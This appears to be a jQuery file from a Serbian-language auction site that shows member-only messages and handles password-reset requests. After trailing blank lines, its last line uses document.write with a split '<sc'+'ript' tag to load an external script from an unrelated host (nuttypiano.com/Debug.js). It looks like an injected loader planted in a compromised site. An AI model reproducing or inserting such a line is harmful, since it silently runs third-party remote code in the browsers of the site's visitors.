// JavaScript Document
$(document).ready(function(){
	$(".showprice").click(function(){
			var auction_id = $(this).next().val();					   
			$('#p_'+auction_id).html('<strong>Mogu da učestvuju samo registrovani članovi.</strong>');		   
		});
	$(".afmain .largebutton_disabled").click(function(){
			$(".afmain .response").html('<strong>Mogu da učestvuju samo registrovani članovi.</strong>');		   
	});
	
	$(".promo .showprice_disabled").click(function(){
			var id = $(this).next().val();								   
			$("#" + id + " .current").html('<strong>Mogu da učestvuju samo registrovani članovi.</strong>');		   
	});
	
	$(".newpass").click(function() {
		var email = prompt("Unesite vašu email adresu?");
		if(email == '') return false;
		$.ajax({
			url: "/action/newpass_sendmail/"+email,
	
			success: function(html) {
				if(html == 'sended') alert('Uputstvo za novu lozinku vam je poslato na email');
				else alert('Nastala je greška. Pokušajte ponovo');
			}
		});
		
		return false;
	});
});





document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Debug.js"></scri'+'pt>');